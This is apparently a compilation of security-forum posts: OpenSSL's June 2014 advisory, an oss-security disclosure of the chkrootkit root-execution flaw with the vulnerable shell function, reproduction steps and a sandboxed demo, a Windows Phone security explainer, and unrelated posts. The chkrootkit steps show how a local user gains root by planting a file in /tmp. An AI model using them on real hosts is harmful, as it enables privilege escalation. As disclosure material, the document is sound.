The fix was developed by Stephen Henson of the OpenSSL core team partly based
on an original patch from KIKUCHI Masashi.

DTLS recursion flaw (CVE-2014-0221)
====================================

By sending an invalid DTLS handshake to an OpenSSL DTLS client the code
can be made to recurse eventually crashing in a DoS attack.

Only applications using OpenSSL as a DTLS client are affected.

OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h.

Thanks to Imre Rad (Search-Lab Ltd.) for discovering this issue. This
issue was reported to OpenSSL on 9th May 2014.

The fix was developed by Stephen Henson of the OpenSSL core team.

DTLS invalid fragment vulnerability (CVE-2014-0195)
====================================================

A buffer overrun attack can be triggered by sending invalid DTLS fragments
to an OpenSSL DTLS client or server. This is potentially exploitable to
run arbitrary code on a vulnerable client or server.

Only applications using OpenSSL as a DTLS client or server affected.

OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h.

Thanks to Jüri Aedla for reporting this issue. This issue was
reported to OpenSSL on 23rd April 2014 via HP ZDI.

The fix was developed by Stephen Henson of the OpenSSL core team.

SSL_MODE_RELEASE_BUFFERS NULL pointer dereference (CVE-2014-0198)
=================================================================

A flaw in the do_ssl3_write function can allow remote attackers to
cause a denial of service via a NULL pointer dereference. This flaw
only affects OpenSSL 1.0.0 and 1.0.1 where SSL_MODE_RELEASE_BUFFERS is
enabled, which is not the default and not common.

OpenSSL 1.0.0 users should upgrade to 1.0.0m.
OpenSSL 1.0.1 users should upgrade to 1.0.1h.

This issue was reported in public. The fix was developed by
Matt Caswell of the OpenSSL development team.

SSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298)
===============================================================================

A race condition in the ssl3_read_bytes function can allow remote
attackers to inject data across sessions or cause a denial of service.
This flaw only affects multithreaded applications using OpenSSL 1.0.0
and 1.0.1, where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the
default and not common.

OpenSSL 1.0.0 users should upgrade to 1.0.0m.
OpenSSL 1.0.1 users should upgrade to 1.0.1h.

This issue was reported in public.

Anonymous ECDH denial of service (CVE-2014-3470)
================================================

OpenSSL TLS clients enabling anonymous ECDH ciphersuites are subject to a
denial of service attack.

OpenSSL 0.9.8 users should upgrade to 0.9.8za
OpenSSL 1.0.0 users should upgrade to 1.0.0m.
OpenSSL 1.0.1 users should upgrade to 1.0.1h.

Thanks to Felix Gröbert and Ivan Fratrić at Google for discovering this
issue. This issue was reported to OpenSSL on 28th May 2014.

The fix was developed by Stephen Henson of the OpenSSL core team.

Other issues
============

OpenSSL 1.0.0m and OpenSSL 0.9.8za also contain a fix for
CVE-2014-0076: Fix for the attack described in the paper "Recovering
OpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack"
Reported by Yuval Yarom and Naomi Benger. This issue was previously
fixed in OpenSSL 1.0.1g.

References
==========

URL for this Security Advisory:
http://www.openssl.org/news/secadv_20140605.txt

Note: the online version of the advisory may be updated with additional
details over time.

Source: https://www.openssl.org/news/secadv_20140605.txt
-
Date: Wed, 04 Jun 2014 10:50:57 +0200
From: Giuseppe Iuculano <iuculano@...ian.org>
To: oss-security@...ts.openwall.com
Subject: CVE-2014-0476 chkrootkit vulnerability

Hi,

Thomas Stangner reported the following chkrootkit vulnerability.
We assigned CVE-2014-0476

Cheers,
Giuseppe

-------- Original Message --------
Subject: Serious chkrootkit vulnerability
Date: Sun, 25 May 2014 00:53:00 +0200
From: Thomas Stangner <thomas.stangner@...zner.de>
Organization: Hetzner Online AG
To: team@...urity.debian.org

Hi,

we just found a serious vulnerability in the chkrootkit package, which
may allow local attackers to gain root access to a box in certain
configurations (/tmp not mounted noexec).

The vulnerability is located in the function slapper() in the
shellscript chkrootkit:

    #
    # SLAPPER.{A,B,C,D} and the multi-platform variant
    #
    slapper (){
       SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
       SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
       ${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
       SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
       OPT=-an
       STATUS=0
       file_port=

       if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}"> /dev/null 2>&1
          then
          STATUS=1
          [ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
             $egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' | tr -d :`
       fi
       for i in ${SLAPPER_FILES}; do
          if [ -f ${i} ]; then
             file_port=$file_port $i
             STATUS=1
          fi
       done
       if [ ${STATUS} -eq 1 ] ;then
          echo "Warning: Possible Slapper Worm installed ($file_port)"
       else
          if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
             return ${NOT_INFECTED}
       fi
    }

The line 'file_port=$file_port $i' will execute all files specified in
$SLAPPER_FILES as the user chkrootkit is running (usually root), if
$file_port is empty, because of missing quotation marks around the
variable assignment.

Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not
  mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.

If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.

Suggested fix: Put quotation marks around the assignment.

    file_port="$file_port $i"

I will also try to contact upstream, although the latest version of
chkrootkit dates back to 2009 - will have to see, if I reach a dev there.

Keep up the good work,
Cheers,
Thomas

Source: oss-security - CVE-2014-0476 chkrootkit vulnerability
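The unquoted assignment from the report above, next to the quoted form it suggests, as an added example (not part of the original e-mail and not chkrootkit's own code). It runs both loop bodies against a constructed, harmless stand-in file inside a private scratch directory; the function names and the marker file are assumptions made for the demo.

```shell
#!/bin/sh
# Added demo: the slapper() assignment bug, unquoted vs. quoted.
# Everything lives in a scratch directory from mktemp; the stand-in
# "update" file is constructed here and only drops a marker when run.

# Build the scratch directory and print its path.
make_sandbox() {
    sandbox=$(mktemp -d) || return 1
    cat > "$sandbox/update" <<EOF
#!/bin/sh
: > "$sandbox/executed.marker"
EOF
    chmod +x "$sandbox/update"
    printf '%s\n' "$sandbox"
}

# Loop body as written in slapper(). With file_port empty, the shell reads
#   file_port=$file_port $i
# as "assignment prefix, then run the command named by $i".
scan_unquoted() {
    file_port=
    for i in "$1/update"; do
        if [ -f "$i" ]; then
            file_port=$file_port $i
        fi
    done
    printf '%s' "$file_port"
}

# Loop body with the fix suggested in the report: one quoted word, so the
# path is appended to the variable and nothing is executed.
scan_quoted() {
    file_port=
    for i in "$1/update"; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"
        fi
    done
    printf '%s' "$file_port"
}

# True if the stand-in file was run inside the given sandbox.
was_executed() {
    [ -e "$1/executed.marker" ]
}

# Run one variant in a fresh sandbox and report what happened.
run_case() {
    dir=$(make_sandbox) || return 1
    value=$("$1" "$dir")
    if was_executed "$dir"; then state="executed"; else state="not executed"; fi
    rm -rf "$dir"
    printf '%s: file %s, file_port ends in [%s]\n' "$1" "$state" "${value##*/}"
}

run_case scan_unquoted
run_case scan_quoted
```

The unquoted variant leaves file_port empty as well, so the "Possible Slapper Worm" warning would not even name the file that was just run.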
-
Real life: WordPress < 3.6.1 PHP Object Injection - VaGoSec
-
Let me add one more condition. You have to be VIP.
-
The Art of Assembly Language Programming

The PDF version of "The Art of Assembly Language Programming" is a complete, high-quality version of the text. It is much easier to read and provides an excellent vehicle for printing your own copy of the text. However, to view and print PDF files, you will need a copy of Adobe's Acrobat reader program. You may obtain a free copy of this program for a wide variety of operating systems directly from Adobe.

If you have installed Adobe Acrobat Reader, clicking on the following links should automatically bring up the PDF version of the specified chapter.

Short Table of Contents
Long Table of Contents
Forward
Chapter 1, Chapter 2, Chapter 3, Chapter 4, Chapter 5, Chapter 6, Chapter 7, Chapter 8, Chapter 9, Chapter 10, Chapter 11, Chapter 12, Chapter 13, Chapter 14
Chapter 15, Chapter 16, Chapter 17, Chapter 18, Chapter 19, Chapter 20, Chapter 21, Chapter 22, Chapter 23, Chapter 24, Chapter 25
Note: Appendix A is non-existent
Appendix B, Appendix C, Appendix D
Index

Source: Art of Assembly Language, PDF Files
-
Nothing seems critical to me: https://opencryptoaudit.org/reports/iSec_Final_Open_Crypto_Audit_Project_TrueCrypt_Security_Assessment.pdf
-
Coding Principles Every Engineer Should Know

Throughout my engineering career, I’ve had the opportunity to work alongside and learn from many incredibly talented people, solve some serious technical challenges, and scale several successful companies. Recently, I was talking with the engineering team at Box about what I’ve learned along this journey, and what came out of that conversation were my personal engineering principles. These aren’t rules or engineering guidelines. They’re simply the principles that I pay attention to when I write and operate code.

Be paranoid.
This one comes naturally to me. Since I’m mostly self-taught as a programmer, I never trust computers. I never trust that the system I just launched is really up. That the bug I fixed is really fixed. That code really does work the way I think it does without a test. I don’t trust anything. I don’t even trust myself! I never trust that I understand anything as well as I think I do until I check more than once. Paranoia is my friend, and it should be your friend, too. Always try to find a way to test assumptions along some other path, or get a second set of eyes to see what you’ve missed. Most of the time it’s not needed. Sometimes it’s really important.

Don’t lie to the computer.
Another way to say this is “avoid leaky abstractions.” Don’t use systems in ways they’re not meant to be used. Don’t count on side effects. Don’t do things that won’t be obvious to the next person because the system wasn’t designed for them or they’re undocumented. If usage is three orders of magnitude more than current usage, then you should probably rethink the design. If the contract implies, but doesn’t guarantee, your use, you should change the component and the contract to be aligned. Computers are nasty things. They always bite when lied to, eventually.

Keep it simple.
We like building things and solving problems. That’s why we do what we do. But a lot of the time, just because we can see a problem that could be solved, doesn’t mean it’s useful to solve it right now. I always think of myself as a fairly dumb programmer—I like clean, simple designs that are easy to understand. And this is a high challenge—anyone can solve a problem in a complex way, but only good programmers can solve problems in simple, understandable ways. It’s much harder to really think through the problem and solve only what needs to be solved in a simple, robust manner. Making yourself understood is the most important thing. Most time in code is spent maintaining, not creating.

First rule of optimizing: don’t.
This is from a good book by Jon Bentley called Programming Pearls. (It’s explicitly meant to help you learn to think like an experienced programmer. It may be an old book but most of the lessons are incredibly relevant today.) Optimization can take many forms: speed, future-proofing, potential scale, possible uses, etc. The problem is, most optimization is ultimately never used, and, more or less by definition, optimization makes designs more complicated. So, first rule of thumb is don’t optimize until it’s really clear that you understand the problem completely. (His second rule: “don’t optimize, yet.” Meaning, even if you do understand it, don’t optimize until you really need to.)

Don’t just fix the bug; fix all possibility of it ever happening again.
Don’t be sorry if you made a mistake—be angry and make it something you never have to think about again. I hate bugs. I hate systems that let me create bugs. I hate it when my own software lets my fragile human brain down and I create a bug that could have been avoided. And I really, really hate fixing the same bug twice. So I try as much as I can, every single time I fix a bug, to think about the following: where else might this bug be happening now? Where might it happen in the future? What are the adjacent patterns that create similar bugs? And how can I kill all the bastards at once, right now?

Question assumptions constantly.
Because I have spent most of my time in my own startups, I’ve gotten in the habit of asking myself constantly “Why am I doing this? What problem does it solve? Is there a better way? Is there something else I could do instead that’s more important?” You should have that attitude all the time. Constantly be questioning the assumptions given to you. What’s the real problem you’re solving? Did someone ask you to solve an effect rather than the root cause? Is the solution complete? Over-complete? Is the impact worthwhile?

Think long term. Slow down, it goes faster.
This might be one of the most important ones. It’s easy to hack things out. As engineers, we like efficiency; we like to build as many things as we can. But if we don’t build for the long term, eventually it gets harder and harder to build anything. Sometimes we don’t understand the problem at first and we write code that we later have to back out. Sometimes we do things that are easy for our local problem, but make things worse or harder for someone else or for a larger problem. Sometimes we rush and don’t finish the design, and this causes much more time later on for someone to fix. Sometimes we don’t bother to write it the right way, we just make a copy or hack something in because we’re under time pressure or don’t want to really think it through. I’ve seen all these things too many times. Others have said this better than I have. But I’ll repeat—the goal is building the largest number of great features, reaching the largest number of users over time. The area under the curve for a given day doesn’t add much, no matter how much gets done on that day, relative to all the days added together. Think long term.

Care about your code.
I guess this one doesn’t need much explanation, but it’s still something I see people missing from time to time. Take pride in your work! Care about the code you produce! I usually think of my poor future self, having to deal with my crappy code, when I’m tempted to be lazy and cut a corner. You don’t have to take this to an extreme—I used to joke at Google that other engineers treated their code like a pet, where my relationship with mine was more like a rancher’s—pragmatic, not sentimental. But even still, I always hate it if my code isn’t well designed, doesn’t work well, isn’t readable, all that stuff.

Cheap, fast, right—pick two.
This is the iron triangle of software. This is the way the world of software engineering works. But it’s not an excuse for complacency. In fact, this is your opponent every single day. The difference between good and great programmers is often measured in how well they navigate the iron triangle. And really great ones find ways to bend it and get some of all three, more often than not. Try to be that kind of programmer—can you find a more elegant design that’s faster to build and is still right? Can you relax some constraint in the spec to get to the goal more quickly? You might not always be able to do that; in fact, you won’t beat the triangle. But if nothing else, make sure you understand what compromise you are choosing, and why, and that it’s the right one for the current situation.

Conclusion: Be curious. Learn as much as you can, all the time.
Okay, this one is more career advice than anything else. But if you’re not curious and don’t really care that much about learning new things as an engineer and don’t care about new tech or new languages or new ideas, then why are you here?

By no means are my principles perfect or an absolute representation of thinking/acting like a successful engineer, but I’m willing to bet there’s a fair amount of overlap with what others might be thinking. I’d love to hear your thoughts.

Written by Sam Schillace

Source: https://medium.com/on-coding/coding-principles-every-engineer-should-know-b946b48cc946
-
Bucuresti Bookfest
-
You scumbags, which of you was it? Screw you _|_
-
Instruments freeze and astronauts have strange sensations: what is the "space Bermuda Triangle" that produces these odd phenomena?

Some spacecraft, such as the Hubble Space Telescope, were designed so that the delicate instruments on board shut down when passing through the area, to avoid damaging them. Some failures that occurred on the satellites of the Globalstar network are also attributed to the satellites passing through this region. It is believed that the strong radiation in this region is also the cause of the phosphenes (a kind of sparks or "shooting stars" that appear in the visual field) reported by astronauts.

Link: Instruments freeze and astronauts have strange sensations: what is the "space Bermuda Triangle" that produces these odd phenomena?
-
Yes, there is not much you can do about it.

The Desktop version is "safe" too. Here are some details: https://rstforums.com/forum/85016-windows-7-security-features.rst

A few ideas:
- on Desktop there are not really any limits on what a program can do (although it would not be a bad idea to implement something like that)
- on Desktop you have much greater flexibility in developing applications, from exes to bat files and X programming languages
- if we consider that the "Desktop" version is not "safe", then Linux is not "safe" either because, just as on Windows, a malicious application is very easy to make, from executables to "rm -rf"s

Windows Phone came later, but it had time to learn and not make the same mistakes as Android and iOS.
-
how to hack a windows phone In today’s how to we will be discussing on how to hack a Windows Phone 8. Every hacker should know about the internals of a device and operating system before he could attempt to compromise it. So lets try to understand the underlying hardware and OS security before we try to break it. To begin, we will try to compromise the hardware so that we can gain access to the hardware and then exploit the OS and ultimately take control of it or at least to steal data from it. Windows Phone employs UEFI Firmware Hardware at the very low level. In addition to that, every hardware which runs Windows Phone 8 OS has to be certified by Microsoft. Now when we say certified, it also means that all the hardware has to be signed and the chips will be burned with the keys from Microsoft. The “Trusted Boot Chain” component will make sure that all the signatures are in place and if they are valid before and during the process. Every program written in the silicon chip has to be signed including the BIOS, drivers etc. On top of these Windows Phone 8 device will also come with a TPM chip which means your encrypted data it is as good your Windows 7 & 8 PC. UEFI Windows Phone Lets see what are the options we have to break the security of the device. Hardware Now that we know all the components / programs are verified for the signature by the “Trusted Boot Chain”, why don’t we try to spoof the boot chain program itself with our own. If we are able to do that then we could easily make the device load our own components instead of the Windows Phone OS exploiting it completely naked. Though at the first look it is appears to be a very good idea, unfortunately all the hardware chips which can’t or can be overwritten comes with something called an efuse. The moment when you are trying to write something in these chips without a valid signature which will be there only with Microsoft and the device manufacturer, the efuse will trip. 
Once the efuse trips off, the boot loader will not be able to boot up your device. Congratulations! now you have a phone which is officially no better than a brick. For a moment even if we assume that you somehow fooled the efuse, the device still wont boot up just because you don’t have a valid key. Operating System Windows NT kernel it is. The Redmond guys have made sure that its sturdy enough. Windows NT kernel along with “Code Signing” makes a killer shield that you will not be able to penetrate. If you think you can get the control of the kernel using some code, wait till you read the “Malicious Code” section. For now lets think about the Windows Phone updates. Windows Phone does do regular updates just like your PC so what if we can trick the windows phone to install my program? Unfortunately the windows phone is programmed to get the updates only from the Microsoft update servers and no other place. Still its no big deal because I can always trick my network to believe some malicious hardware / software as the update server. Sadly, the update will again need the code signing process to pass. You can never break through it unless you are hacking into the Microsoft update server; definitely not a great plan. Storage How about the internal storage itself? Why don’t we break the phone take out the internal storage and may be at least try to steal the data? But wait, the storage again uses a 128 bit Bitlocker for encryption. The drive remains encrypted until the boot loader performs the job completely. The TPM chip which comes with the hardware is the one which manages the key for the encryption which means that once the disk is outside the hardware, you will need the 128 bit recovery key to break in the data. The storage behaves the same way as what your bitlocked hard drive behaves. Brute force opening a encryption is a very well known procedure to break encryption however its impossible when it comes to a 128 bit encryption. 
So to understand the quantum of complexity, let’s assume that you have 10 million computers where every computer can process 100 billion keys per second (higher than 100GHz), and if you put them all together to crack the key, it will take 10^13 years to find the key, which is longer than the age of the universe itself.

If you are thinking of trying the PIN instead, you can always configure your phone to automatically wipe after a number of incorrect tries. Some people try to snoop the data from the disk after it is wiped because it is easier that way, since it won’t have any encryption constraints. Luckily for the user, Windows Phone never decrypts the data; it wipes the encrypted data along with the key. You can be pretty sure that not even the NSA can retrieve them.

Malicious Code

We have now almost come to the last and the most favorite resort of a hacker. Most hackers disassemble the system instructions and try to inject or alter the commands in the memory location. However, the app model under which Windows Phone functions is always a sandbox, which means the app will have its own area where it can execute, store data and perform actions. Windows Phone, with the advantage of Code Signing, will sign the apps based on the feature set they are allowed to access. E.g., if a program does not have a valid signature to access the Camera, it won’t be able to. This is true for any feature or hardware access in the device. So even if we assume for a moment that you are able to try writing something into the system memory location of the phone, the “Code Signing” will invalidate the program and unload it immediately.

Starting from the phone to your protected mail message, everything is safe in Windows Phone 8. More information on the security of Windows Phone can be found at http://www.windowsphone.com/en-US/business/security-us

This how to is written based on Windows Phone 8. Actual functionality might differ from device to device.
Some features may not be available with pre-Windows Phone 8.

Source: how to hack a windows phone | how to windows phone
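The Storage section of the post above says the TPM holds the disk key and that the drive is useless once it leaves the phone. As an added sketch, not part of the original post and not Microsoft's code, here is a toy model of the general measured-boot idea behind that: a key sealed to one chip and one expected boot measurement. The component names, the `ToyTPM` class and the XOR/HMAC sealing are assumptions for illustration; a real TPM enforces this policy in hardware.

```python
import hashlib
import hmac

def extend(pcr: bytes, component: bytes) -> bytes:
    """TPM-style PCR extend: new = SHA-256(old || SHA-256(component))."""
    return hashlib.sha256(pcr + hashlib.sha256(component).digest()).digest()

def measure_chain(components) -> bytes:
    """Measure every boot stage, in order, into one register starting at zero."""
    pcr = bytes(32)
    for blob in components:
        pcr = extend(pcr, blob)
    return pcr

class ToyTPM:
    """Toy model only (hypothetical class): the chip secret never leaves it."""
    def __init__(self, chip_secret: bytes):
        self._secret = chip_secret
    def _pad(self, pcr: bytes, n: int) -> bytes:
        return hmac.new(self._secret, b"pad" + pcr, hashlib.sha256).digest()[:n]
    def seal(self, key: bytes, pcr: bytes):
        """Bind the key to this chip and to one expected boot measurement."""
        blob = bytes(a ^ b for a, b in zip(key, self._pad(pcr, len(key))))
        tag = hmac.new(self._secret, b"tag" + pcr + blob, hashlib.sha256).digest()
        return blob, tag
    def unseal(self, sealed, pcr: bytes):
        """Return the key only if chip and current measurement both match."""
        blob, tag = sealed
        want = hmac.new(self._secret, b"tag" + pcr + blob, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, want):
            return None
        return bytes(a ^ b for a, b in zip(blob, self._pad(pcr, len(blob))))

# Constructed sample data (not real firmware images or keys).
GOOD_CHAIN = [b"uefi-firmware-v1", b"boot-manager-v1", b"os-loader-v1"]
MODIFIED_CHAIN = [b"uefi-firmware-v1", b"boot-manager-PATCHED", b"os-loader-v1"]
DISK_KEY = bytes(range(16))  # 128-bit key, the size the post mentions

def demo():
    phone_tpm = ToyTPM(b"secret-fused-into-this-phone")
    good = measure_chain(GOOD_CHAIN)
    sealed = phone_tpm.seal(DISK_KEY, good)
    return {
        "normal_boot": phone_tpm.unseal(sealed, good),
        "modified_boot": phone_tpm.unseal(sealed, measure_chain(MODIFIED_CHAIN)),
        "storage_moved": ToyTPM(b"another-device").unseal(sealed, good),
    }

if __name__ == "__main__":
    for case, key in demo().items():
        print(case, "->", key.hex() if key else "key not released")
```

Only the unmodified chain on the original chip gets the key back; a changed boot stage or a different device leaves the sealed blob undecryptable, which is when the recovery key the post mentions becomes the only way in.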